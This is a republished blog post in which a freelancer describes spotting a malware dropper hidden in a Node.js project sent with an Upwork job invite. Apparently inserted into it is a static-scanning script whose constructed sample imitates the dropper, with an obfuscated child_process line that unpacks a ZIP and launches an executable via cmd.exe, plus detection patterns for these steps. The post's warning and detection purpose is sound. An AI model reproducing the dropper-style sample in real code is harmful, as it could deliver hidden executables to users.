This content originally appeared on DEV Community and was authored by Bashar V I
Today I received an Upwork job invite titled
“Experienced Node.js Coder Needed for Bug Fix”
with a tempting $760 fixed price and a Dropbox link to the code.
It looked normal at first, but a few details didn’t sit right:
- 💸 Unrealistic budget for a simple bug fix.
- 📦 The client insisted I download and run a ZIP immediately to “see the error.”
- 👤 Profile not payment verified and brand-new.
Instead of running it, I inspected the archive without executing anything.
Here’s what I found:
- node/helpers/css.js reads a “CSS” file (public/css/types.txt) and runs it with eval(), but only on Windows.
- types.txt isn’t CSS at all; it’s obfuscated JavaScript that extracts hidden ZIPs (js.zip, node.zip, i.zip) and silently spawns Windows executables via cmd.exe /c start.
- The project even bundles a 7-Zip binary so it can unpack those hidden files locally.
That pattern—obfuscation + hidden zips + detached .exe launch—is exactly how a dropper/backdoor works.
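The inspection above can be turned into a repeatable, no-execution triage step. The script below is an added example, not code from the original post and not the archive the author received: it walks an in-memory map of project files, identifies archives and Windows executables by magic bytes rather than by name, undoes the simplest string obfuscation (\xHH escapes) so constants such as cmd.exe /c start become visible, and flags JavaScript syntax hiding in files whose extension says they are not code. The indicator list, the sample files (constructed to mimic the described layout) and the "three distinct indicators" threshold are all assumptions chosen for illustration; nothing from the scanned project is ever evaluated or spawned.

```javascript
"use strict";
// Added example (not from the original post): static triage of an untrusted
// Node.js project for the dropper pattern described above. Bytes and text are
// only read and pattern-matched; nothing from the project is executed.

// Text indicators a reviewer would grep for. Heuristics, not proof.
const SOURCE_INDICATORS = [
  { id: "eval-call", re: /\beval\s*\(/, why: "eval() of runtime-built code" },
  { id: "platform-gate", re: /process\.platform\s*===?\s*['"]win32['"]/, why: "behaviour gated to Windows" },
  { id: "child-process", re: /require\s*\(\s*['"]child_process['"]\s*\)/, why: "spawns external processes" },
  { id: "cmd-start", re: /cmd(?:\.exe)?\s+\/c\s+start\b/i, why: "detached launch via cmd.exe /c start" },
  { id: "7zip-invocation", re: /\b7za?(?:\.exe)?\b/i, why: "invokes a bundled 7-Zip binary" },
  { id: "hex-obfuscation", re: /(?:\\x[0-9a-fA-F]{2}){8,}/, why: "long run of \\x escapes (string obfuscation)" },
];

// Extensions that should never carry JavaScript source.
const NON_CODE_EXT = new Set([".txt", ".css", ".json"]);
const JS_SYNTAX = /\b(?:function|require|eval|var|let|const)\b/;

function extOf(relPath) {
  const base = relPath.slice(relPath.lastIndexOf("/") + 1);
  const dot = base.lastIndexOf(".");
  return dot > 0 ? base.slice(dot).toLowerCase() : "";
}

// Undo \xHH and \uHHHH escapes so obfuscated string constants become greppable.
function decodeEscapes(text) {
  return text
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Identify archives and Windows executables by magic bytes, not by file name.
function sniffMagic(buf) {
  if (buf.length >= 4 && buf.readUInt32BE(0) === 0x504b0304) return "zip"; // "PK\x03\x04"
  if (buf.length >= 2 && buf.readUInt16BE(0) === 0x4d5a) return "pe";      // "MZ"
  return null;
}

function scanFile(relPath, buf) {
  const findings = [];
  const add = (id, why) => findings.push({ file: relPath, id, why });
  const magic = sniffMagic(buf);
  if (magic === "zip") add("nested-archive", "archive shipped inside the project");
  if (magic === "pe") add("bundled-executable", "Windows PE binary (MZ header) in a source project");
  if (magic !== null || buf.indexOf(0) !== -1) return findings; // binary: nothing to grep

  const raw = buf.toString("utf8");
  const decoded = decodeEscapes(raw);
  const ext = extOf(relPath);
  if (NON_CODE_EXT.has(ext) && JS_SYNTAX.test(decoded)) {
    add("disguised-script", `JavaScript syntax inside a ${ext} file`);
  }
  for (const { id, re, why } of SOURCE_INDICATORS) {
    if (re.test(raw) || re.test(decoded)) add(id, why);
  }
  return findings;
}

// files: { "relative/path": Buffer }. Returns every finding plus a verdict.
function scanProject(files) {
  const findings = [];
  for (const [relPath, buf] of Object.entries(files)) findings.push(...scanFile(relPath, buf));
  const indicators = [...new Set(findings.map((f) => f.id))].sort();
  // Assumed threshold: three distinct indicators is far beyond what a normal
  // bug-fix repository shows, so the verdict is "do not run, report it".
  return { findings, indicators, suspicious: indicators.length >= 3 };
}

// Constructed sample modelled on the post's description; not the real archive.
const SAMPLE_PROJECT = {
  "node/helpers/css.js": Buffer.from(
    "const fs = require('fs');\n" +
    "function loadTypes() {\n" +
    "  const css = fs.readFileSync('public/css/types.txt', 'utf8');\n" +
    "  if (process.platform === 'win32') eval(css); // 'CSS' executed on Windows only\n" +
    "}\nmodule.exports = { loadTypes };\n"),
  // Hex-escaped strings decode to 'cmd.exe /c start' and '7z.exe'.
  "public/css/types.txt": Buffer.from(String.raw`var _0x1f=['\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x73\x74\x61\x72\x74','\x37\x7a\x2e\x65\x78\x65'];
require('child_process').exec(_0x1f[1]+' x -y i.zip && '+_0x1f[0]+' i.exe');`),
  "i.zip": Buffer.from([0x50, 0x4b, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00]),
  "bin/7z.exe": Buffer.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00]),
  "public/css/style.css": Buffer.from("body { margin: 0; }\n"),
};

// Constructed benign project for comparison.
const BENIGN_PROJECT = {
  "index.js": Buffer.from("const http = require('http');\nhttp.createServer().listen(3000);\n"),
  "package.json": Buffer.from('{"name":"app","main":"index.js"}\n'),
};

if (typeof require !== "undefined" && require.main === module) {
  const report = scanProject(SAMPLE_PROJECT);
  for (const f of report.findings) console.log(`${f.file}: ${f.id} (${f.why})`);
  console.log(report.suspicious ? "VERDICT: do not run; report it" : "VERDICT: no dropper indicators");
}
if (typeof module !== "undefined") {
  module.exports = { scanFile, scanProject, decodeEscapes, SAMPLE_PROJECT, BENIGN_PROJECT };
}
```

On the constructed sample the scan reports nine distinct indicators (the Windows-only eval, the script disguised as .txt, the hex obfuscation that hides cmd.exe /c start and 7z.exe, the child_process spawn, the nested ZIP and the bundled PE binary), while the benign project reports none. To use it on a real download, read the archive's entries into the same path-to-Buffer map with an archive library of your choice instead of extracting them to disk; the point is that the verdict is reached without running, installing or unpacking anything from the client.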
I’ve flagged the job and reported it to @Upwork Trust & Safety so they can warn others.
🔑 Takeaways for fellow freelancers
- Never run code from strangers without first looking inside (even on trusted platforms).
- Watch for red flags: unverified payment, big payout for trivial work, pressure to run code immediately.
- If something feels off, stop, inspect, and report.
Stay safe and keep each other safe.
#Upwork #freelance #security #NodeJS #infosec #webdev #malware

Bashar V I | Sciencx (2025-09-23T20:14:13+00:00) 🚨 Freelancers beware: how a suspicious “Node.js bug fix” invite helped me spot a possible malware dropper on Upwork. Retrieved from https://www.scien.cx/2025/09/23/%f0%9f%9a%a8-freelancers-beware-how-a-suspicious-node-js-bug-fix-invite-helped-me-spot-a-possible-malware-dropper-on-upwork-2/